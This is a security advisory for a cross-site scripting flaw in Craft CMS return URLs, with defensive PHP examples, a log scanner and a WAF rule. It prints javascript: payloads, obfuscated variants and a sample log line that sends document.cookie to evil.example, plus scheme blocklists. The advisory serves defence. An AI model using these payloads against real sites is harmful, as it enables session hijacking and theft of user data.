CVE-2026-31859 Overview
CVE-2026-31859 is a cross-site scripting (XSS) vulnerability in Craft CMS, a widely used PHP content management system. It stems from an incomplete fix for CVE-2025-35939: that fix passed user-supplied return URLs through PHP's strip_tags() in src/web/User.php before storing them in the session. strip_tags() removes only angle-bracketed HTML and PHP tags; it never looks at the URL scheme. A value such as javascript:alert(1) contains no tags, so it passes through unchanged, is stored in the session, and is later emitted as the href of a link. When the user clicks that link, the browser runs the script in the origin of the Craft site.
Critical Impact
An attacker who gets an authenticated user to follow a crafted link, and then to click the element whose href carries the stored return URL, can run arbitrary JavaScript in that user's session: perform control-panel actions as the victim, read page content, or redirect the victim to an attacker-controlled site. Reading the session cookie itself only works if the cookie is not flagged HttpOnly; script running inside the session does not need the cookie value to act as the user.
Affected Products
- Craft CMS 5.x versions prior to 5.9.7
- Craft CMS 4.x versions prior to 4.17.3
- Installed via the craftcms/cms Composer package in both cases
Discovery Timeline
- 2026-03-11 - CVE-2026-31859 published to NVD
- 2026-03-12 - Last updated in NVD database
Technical Details for CVE-2026-31859
Vulnerability Analysis
This is a textbook case of incomplete input validation. The fix for CVE-2025-35939 treated the return URL as a string to be cleaned of markup rather than as a URL to be validated: strip_tags() does remove anything enclosed in angle brackets, but the danger in a URL lies in its scheme, which strip_tags() never examines.
strip_tags() removes HTML and PHP tags from a string; schemes such as javascript:, vbscript: or data: contain no angle brackets and survive untouched. When the stored value is later written into an href attribute, the browser treats a click on that element as a request to run the script. Any scheme check therefore has to be done on the decoded value and has to tolerate what browsers tolerate: scheme names are case-insensitive, and browsers strip tab and newline characters inside them, so JaVaScRiPt: and java<TAB>script: are both javascript: to the browser.
The weakness is CWE-79 (Improper Neutralization of Input During Web Page Generation). It is reported as reflected XSS; in practice the payload is parked in the victim's session between the crafted request and the page that renders it, so it survives until that page is visited. Exploitation needs user interaction (following a crafted link, then clicking the affected element) but no authentication or privileges on the attacker's side.
Root Cause
The root cause is using strip_tags() as a URL sanitiser in src/web/User.php: it was introduced as a security measure but validates nothing about the URL. The correct mitigation is an allowlist that accepts only site-relative paths and absolute URLs whose scheme is http or https. A blocklist of javascript:, vbscript: and data: is weaker because it has to anticipate every encoding, case and whitespace variant the browser will still accept as the same scheme.
Attack Vector
The attack is delivered over the network and needs user interaction. The attacker crafts a link to the Craft site whose return URL parameter carries a javascript: payload. When a victim follows the link, Craft stores the payload in that victim's session; when the page that uses the stored return URL is rendered, the payload lands in an href. Clicking that element runs the script in the victim's browser, in the origin of the Craft site, with whatever the victim's session is allowed to do.
A minimal payload is javascript:alert(document.cookie); a real one would perform authenticated actions in the victim's session or send page content to an attacker-controlled host. Because the payload contains no angle brackets, strip_tags() returns it byte-for-byte unchanged and it is stored in the session as sent.
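The following PHP is an added example, not code from Craft CMS or from the patch. It shows why strip_tags() passes the payload through untouched, and what a scheme-allowlist check for return URLs looks like. The function name isSafeReturnUrl() and the test inputs are my own; the check also rejects protocol-relative (//host) URLs and control characters, which goes beyond the plain http:/https: allowlist described above.

```php
<?php
// Added example, not Craft CMS code. Shows (1) that strip_tags() leaves a
// javascript: payload intact and (2) an allowlist-based return-URL check.

// strip_tags() only removes <...> markup; a URL scheme is not markup.
$payload = 'javascript:alert(document.cookie)';
printf("strip_tags() changed the payload: %s\n", strip_tags($payload) === $payload ? 'no' : 'yes');
// Even a data: URL keeps its scheme after the tags inside it are stripped.
printf("strip_tags() on a data: URL gives: %s\n", strip_tags('data:text/html,<script>alert(1)</script>'));

/**
 * Hypothetical validator (assumption: not Craft's own API). Accepts either a
 * site-relative path or an absolute http(s) URL and rejects everything else.
 */
function isSafeReturnUrl(string $url): bool
{
    // Browsers drop tabs and newlines inside a scheme, so "java\tscript:" is
    // still javascript: to the browser while parse_url() sees no scheme at
    // all. Reject ASCII control characters and whitespace up front.
    if ($url === '' || preg_match('/[\x00-\x20\x7f]/', $url)) {
        return false;
    }
    // Site-relative path: a single leading slash. "//host" and "/\host" are
    // protocol-relative redirects to another origin and are rejected.
    if ($url[0] === '/') {
        return !isset($url[1]) || ($url[1] !== '/' && $url[1] !== '\\');
    }
    // Anything else must be an absolute URL with an allowlisted scheme.
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return false;
    }
    return in_array(strtolower($parts['scheme']), ['http', 'https'], true);
}

// Constructed test inputs with the verdict an allowlist should reach.
$cases = [
    '/admin/dashboard'                  => true,
    'https://example.com/admin'         => true,
    'javascript:alert(document.cookie)' => false,
    'JaVaScRiPt:alert(1)'               => false,
    "java\tscript:alert(1)"             => false,
    'data:text/html,<b>x</b>'           => false,
    '//evil.example/phish'              => false,
    ' javascript:alert(1)'              => false,
];
foreach ($cases as $url => $expected) {
    $got = isSafeReturnUrl($url);
    printf("%-38s -> %-5s %s\n",
        json_encode($url, JSON_UNESCAPED_SLASHES),
        $got ? 'allow' : 'deny',
        $got === $expected ? 'OK' : 'MISMATCH');
}
```

Run it with php on the command line (PHP 7.0 or later). For a return URL the absolute-URL branch should normally also compare the host against the site's own host, otherwise the same parameter becomes an open redirect; that check is left out here because it is unrelated to the XSS.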
Detection Methods for CVE-2026-31859
Indicators of Compromise
- Return URL parameters in web-server access logs whose value starts with javascript:, vbscript: or data:, allowing for URL encoding (javascript%3A) and mixed case
- Session data (PHP session files or the configured session store) containing return-URL values with a script-capable scheme
- Reports from authenticated users of unexpected JavaScript execution or browser alerts after following a link
- Requests carrying a return URL parameter whose Referer header points at an external domain
Detection Strategies
- Add WAF rules that block requests whose return URL parameter begins with javascript:, vbscript: or data:; match on the decoded, lowercased value with tabs and newlines removed, because the browser ignores those characters inside a scheme
- Deploy a Content Security Policy: a javascript: URL in an href counts as inline script, so a script-src directive without 'unsafe-inline' stops it executing even when the payload is rendered
- Search web-server logs for return URL parameters with suspicious schemes, decoding the query string before matching
- Send CSP violation reports (report-to or report-uri) to a collector so blocked javascript: navigations are recorded rather than silently dropped
Monitoring Recommendations
- Monitor application logs for return URL parameters with a scheme other than http or https, or with no scheme but a leading // (protocol-relative)
- Alert on CSP violation reports against script-src, which may indicate attempted exploitation
- Watch for session anomalies that suggest hijacking after a successful XSS: the same session used from a new IP address or User-Agent, or control-panel actions that follow shortly after a request carrying a suspicious return URL
- Feed access logs into real-time analysis that alerts on the patterns above
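As an added example (not part of the page or of Craft CMS), the following PHP script scans access-log lines for return-URL parameters carrying a script-capable scheme. The parameter names returnUrl and redirect and the three log lines are constructed assumptions. The point it makes is that the raw log text may contain javascript%3A or java%09script:, so the query string must be decoded the way PHP decodes it and tabs, newlines and case must be normalised before matching.

```php
<?php
// Added example, not Craft CMS code. Requires PHP 8.0+ (str_starts_with).

// Assumption: parameter names a return URL might travel in. Check which
// names your Craft install actually uses and adjust.
const RETURN_URL_PARAMS = ['returnUrl', 'redirect'];
const DANGEROUS_SCHEMES = ['javascript', 'vbscript', 'data'];

/**
 * Inspect one request target ("/index.php?p=...") and return a list of
 * [parameterName, scheme, rawValue] for every suspicious return URL found.
 */
function findSuspiciousReturnUrls(string $requestTarget): array
{
    $hits = [];
    $query = parse_url($requestTarget, PHP_URL_QUERY);
    if (!is_string($query)) {
        return $hits;
    }
    // parse_str() decodes %XX and '+' exactly as PHP does for $_GET, so an
    // encoded javascript%3A is seen the way the application will see it.
    parse_str($query, $params);
    foreach (RETURN_URL_PARAMS as $name) {
        if (!isset($params[$name]) || !is_string($params[$name])) {
            continue;
        }
        $value = $params[$name];
        // Drop ASCII control characters and whitespace and lowercase before
        // matching: browsers ignore tabs/newlines inside a scheme name and
        // treat schemes case-insensitively, so "JaVa\tScRiPt:" must match.
        $normalised = strtolower(preg_replace('/[\x00-\x20\x7f]/', '', $value));
        foreach (DANGEROUS_SCHEMES as $scheme) {
            if (str_starts_with($normalised, $scheme . ':')) {
                $hits[] = [$name, $scheme, $value];
            }
        }
    }
    return $hits;
}

// Constructed sample lines in combined log format (not real traffic).
$lines = [
    '203.0.113.5 - - [11/Mar/2026:10:00:01 +0000] "GET /index.php?p=admin/login&returnUrl=%2Fadmin%2Fdashboard HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [11/Mar/2026:10:00:07 +0000] "GET /index.php?p=admin/login&returnUrl=javascript%3Aalert(document.cookie) HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [11/Mar/2026:10:00:09 +0000] "GET /index.php?p=admin/login&returnUrl=JaVa%09ScRiPt:fetch(%27https://evil.example/%27%2Bdocument.cookie) HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
];

foreach ($lines as $line) {
    // Pull the request target out of the quoted request line.
    if (!preg_match('/"(?:GET|POST|HEAD) (\S+) HTTP\/[\d.]+"/', $line, $m)) {
        continue;
    }
    $clientIp = explode(' ', $line, 2)[0];
    foreach (findSuspiciousReturnUrls($m[1]) as [$param, $scheme, $value]) {
        printf("ALERT %s %s=%s (scheme %s)\n", $clientIp, $param, $value, $scheme);
    }
}
```

On the sample input the first line is clean and the second and third both produce an ALERT, the third despite the mixed case and the encoded tab inside the scheme name. A plain grep for the literal string javascript: would have missed both.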
How to Mitigate CVE-2026-31859
Immediate Actions Required
- Upgrade Craft CMS to version 5.9.7 or later on the 5.x branch
- Upgrade Craft CMS to version 4.17.3 or later on the 4.x branch
- Check that the craftcms/cms constraint in composer.json allows the patched release, then run composer update craftcms/cms -w (the -w flag also updates Craft's own dependencies)
- Add Content Security Policy headers as a defence-in-depth measure; a script-src without 'unsafe-inline' blocks javascript: URLs in links even if a payload reaches the page
Patch Information
The vulnerability is fixed in Craft CMS 5.9.7 and 4.17.3. The patch replaces tag stripping with proper URL scheme validation so that only http: and https: return URLs are accepted. Update via Composer as soon as possible. For the patch itself, refer to the GitHub Security Advisory.
Workarounds
- Add a reverse-proxy or WAF rule that blocks (rather than strips) requests whose URL parameters carry a javascript:, vbscript: or data: scheme; stripping leaves an ambiguous value behind, and a blocklist rule is bypassable by encoding and whitespace tricks, so treat it as a stopgap only
- Deploy a Content Security Policy with a script-src that omits 'unsafe-inline' so that javascript: links cannot execute; test it against the control panel first, since admin interfaces commonly rely on inline scripts and will need a nonce or hash in the policy
- Temporarily disable functionality that relies on user-controlled return URLs if upgrading is not immediately possible
- Monitor and filter session data for malicious URL schemes at the application layer
# Example: Apache mod_rewrite rule to reject requests whose query string
# carries a javascript:, vbscript: or data: scheme at the start of a value.
# QUERY_STRING is matched raw (not URL-decoded), so the colon is matched
# both literally and as %3A, and encoded tab/newline/space before the scheme
# name are tolerated. This is a blocklist and is bypassable; use it only as
# a stopgap until the upgrade is applied.
RewriteEngine On
RewriteCond %{QUERY_STRING} (^|[&=])(%0[9ad]|%20|\s)*(javascript|vbscript|data)(:|%3a) [NC]
RewriteRule .* - [F,L]
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.


